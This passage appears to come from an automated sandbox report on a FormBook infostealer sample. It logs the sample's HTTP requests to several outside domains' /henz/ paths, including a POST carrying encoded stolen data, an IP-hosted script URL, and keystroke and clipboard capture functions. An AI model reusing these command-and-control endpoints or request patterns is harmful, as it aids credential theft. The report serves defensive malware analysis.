2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 3a 35 70 78 20 30 20 31 30 70 78 20 31 35 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:25:33 GMTServer: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635Accept-Ranges: bytesConnection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 35 37 39 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 3a 35 70 78 20 30 20 31 30 70 78 20 31 35 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:25:39 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:25:41 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:25:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:25:56 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:26:01 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=c570c0e56952311d05e6ddd9a42f969d; path=/; HttpOnlyUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 869Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 db 6e e4 36 0c 7d cf 57 28 7e ed c8 9e 74 93 b4 48 c7 53 60 b3 4d 81 02 db 04 4d ba 40 9f 0a d9 a2 6d 6d 24 51 90 38 37 a0 1f 5f d9 1e cf 2d 93 ec 26 31 40 88 34 c9 c3 db 99 9c 7e ba bd 7e f8 e7 ee 37 d6 90 d1 d3 93 49 fb 30 2d 6c 9d 27 60 f9 2c 24 d3 13 16 bf 49 03 42 f6 6a 67 1a 20 c1 ca 46 f8 00 94 27 33 aa f8 cf c9 13 37 5a 02 1b dd 0b 25 a9 c9 25 cc 55 09 bc 33 46 4c 59 45 4a 68 1e 4a a1 21 3f 4b c7 09 b3 c2 40 9e cc 15 2c 1c 7a 8a 70 5b 3c 52 a4 61 3a c9 fa f7 a0 4e 9f e7 b1 40 0a c9 b6 aa 45 65 25 2c 47 cc 62 85 5a e3 e2 f9 06 87 da 12 42 e9 95 23 85 f6 db c1 8f b0 5a a0 97 61 af d1 53 ce d9 8d 88 83 a2 0d 8c f3 e8 3a 70 fe 8e 58 6b 60 37 11 ad 0f d8 78 b5 b2 8f ac f1 50 e5 49 43 e4 c2 55 96 55 6d 54 5a 77 29 c2 a9 90 96 68 b2 32 84 5f 2b 61 94 5e e5 b7 0e ec 0f f7 c2 86 ab 0f e3 f1 28 8a 1a 9d 47 e5 bc 55 2e a3 72 d9 2a 3f 45 25 8a fa ef af b8 e9 85 58 1d 89 bd 88 ca c5 f1 a4 3b 74 4e 1d 2d f0 7c 52 c2 3c e8 3c 09 b4 d2 10 1a 00 7a b2 a2 2f 60 25 7a 76 7d 7f cf 6e 54 0c 7a 76 13 d9 fc c7 7f e7 5d 70 26 30 b4 92 c6 f9 8f 15 f8 46 76 81 91 1d e4 85 6b f7 b7 b5 52 a3 ec 7b 11 79 77 ed 43 fb cd a8 cb 1e ae 6f b3 37 de d1 65 ad 55 dd 50 04 ea 00 37 d6 3b 10 3d 18 d5 b5 b5 d5 de 88 14 16 ca c1 f0 f0 62 66 a5 86 57 37 d6 8e 55 a1 25 2e 16 10 d0 bc 08 b0 4f c2 07 30 4e 0b 02 f6 59 28 bb e1 e2 8b 54 6c 8b 75 88 2f b5 38 c9 1a 10 72 5d ad ff 53 a0 5c ed a0 4a 35 67 a5 16 21 e4 89 13 52 2a 5b 73 23 13 d6 21 e5 89 11 be 56 96 13 ba ab 8b b1 5b fe 32 c0 ee 64 79 5c 24 c7 f1 4a d4 11 8b 9f b3 b5 82 55 15 80 d6 76 30 fc 72 50 d6 8e 0f 8c 60 49 bc 04 4b e0 77 30 0f 71 9b 8b 64 7a 8b 2e 8c d8 43 a3 02 bb 13 35 b0 6b 9c 69 c9 fe 44 62 1f 81 dd 60 bc df e9 24 8b 39 07 28 cd d9 00 62 da a1 b8 45 0b 0c bc 47 cf db 45 c5 e9 93 e9 f9 f8 3c ae ed 6c e7 44 9b e5 6d 70 c4 00 53 90 65 51 78 98 95 25 84 c0 0c 2f 90 08 4d 1c 2b 59 1f 2b 99 4e d4 10 5e 09 56 09 de 44 6e c4 bf 99 9a b2 8f a2 7c 64 84 ec 93 08 4d 81 c2 cb 49 26 a6 6f af 95 95 91 7e a2 24 3e 0b 4f cb 82 9d 83 46 37 94 be ee 43 d9 df 61 af 66 bf b6 8e 95 59 1a 0f b4 21 e1 9e 23 5e bd 73 ec fd dc 12 68 9f b9 ad f7 0b 58 89 9e fd d1 33 3b f4 c9 a1 f4 ca 11 0b be ec 39 3d ef 82 32 37 f3 50 c6 1b 46 1a ec ea e9 d7 76 a8 ac 4f 7a 3e 5b 60 68 e5 3b a3 0b 44 0a e4 85 cb be 86 ad 91 16 91 41 1a 52 a3 ec 77 e2 d4 5a d5 0d 15 b8 6c 71 36 c6 2b 00 54 c0 c8 48 e0 5a ac 70 46 83 99 ba c7 5a be 02 25 2c 94 83 e1 e1 af 9e c2 35 8e 83 11 4a f3 0a bd c9 e6 42 2b 29 08 0e b2 4f ba 8b 3e 80 71 3a 3a d9 67 a1 ec 70 d8 e3 77 8d 2b 89 a0 87 4d f4 a4 2a 50 ae 5a 1e 35 64 f4 f4
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:26:03 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=642acd1bd4e5af4738220f65563c7d37; path=/; HttpOnlyUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 61 30 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 73 20 2d 2d 3e 0a 0a 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 46 6f 6e 74 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 7c 52 61 6c 65 77 61 79 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 35 30 30 2c 35 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 7c 50 6f 70 70 69 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 35 30 30 2c 35 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 56 65 6e 64 6f 72 20 43 53 53 20 46 69 6c 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 76 32 5f 76 65 6e 64 6f 72 2f 61 6f 73 2f 61 6f 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 76 32 5f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 76 32 5f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 6
Source: help.exe, 00000005.00000002.569839214.0000000004494000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.568262746.00000000007E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://206.119.101.137/ak_Address/Address.js
Source: help.exe, 00000005.00000002.569583171.0000000003996000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://code.jquery.com/jquery-3.3.1.min.js
Source: help.exe, 00000005.00000002.569583171.0000000003996000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://gmpg.org/xfn/11
Source: Lc8xQv8iZY.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Lc8xQv8iZY.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000004.00000000.348880659.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.323170503.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.368664553.0000000008260000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: -ODfqI49.5.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: -ODfqI49.5.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: -ODfqI49.5.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: -ODfqI49.5.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: help.exe, 00000005.00000002.569785642.0000000004302000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: help.exe, 00000005.00000002.569839214.0000000004494000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.568262746.00000000007E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?d0766413c666e394f861185086d7f52f
Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: help.exe, 00000005.00000002.569622242.0000000003B28000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.lyonfinancialusa.com/henz/?4hq=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs
Source: unknown HTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.lyonfinancialusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lyonfinancialusa.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 46 5f 54 33 34 4d 43 59 37 4c 4c 6c 35 30 36 46 70 55 6d 45 4c 6d 56 30 6d 31 6d 41 7e 59 47 31 45 72 5a 72 7a 51 72 43 4f 57 4d 4c 57 30 50 39 66 6d 38 71 30 51 56 44 6d 5a 39 4b 58 4c 58 59 43 47 67 65 67 44 28 54 4b 77 71 30 79 6a 6f 58 48 68 65 62 75 32 37 65 5a 42 62 45 69 45 6b 62 33 42 53 6a 35 64 4f 6e 57 42 38 78 4b 44 71 48 63 52 32 4b 48 38 32 37 68 43 41 6c 51 79 65 4e 57 59 50 55 32 4c 59 59 6e 75 74 6f 58 35 49 43 7a 65 73 58 73 41 4b 7a 4d 4c 79 53 41 5f 6b 2d 4b 4d 30 4f 32 5f 38 30 57 4c 61 6b 52 4f 65 51 4c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-KM0O2_80WLakROeQLw).
Source: unknown DNS traffic detected: queries for: www.eufidelizo.com
Source: global traffic HTTP traffic detected: GET /henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28Gxg HTTP/1.1Host: www.eufidelizo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzEsULWUGP1g0EPzg==&o8=wR-h28Gxg HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/EbwlnLs/kdjkkcQ==&o8=wR-h28Gxg HTTP/1.1Host: www.afterdarksocial.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28Gxg HTTP/1.1Host: www.patrickguarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28Gxg HTTP/1.1Host: www.brennancorps.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28Gxg HTTP/1.1Host: www.lopezmodeling.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=jIhXpQA4pSG2yYWBb37zpp/PG+nmQ9F5uiLrR0YNz1ez7r/FQUV2GqKIrgsyQUbvld7C5UuQUlYsY6nmozac85OtAKDr0AUC2A==&o8=wR-h28Gxg HTTP/1.1Host: www.foxwhistle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_004050C0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard, 1_2_004050C0
Creates a DirectInput object (often for capturing keystrokes)
Source: Lc8xQv8iZY.exe, 00000000.00000002.312089969.00000000006BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_00404020 GetKeyboardState, 1_2_00404020
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405125

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE
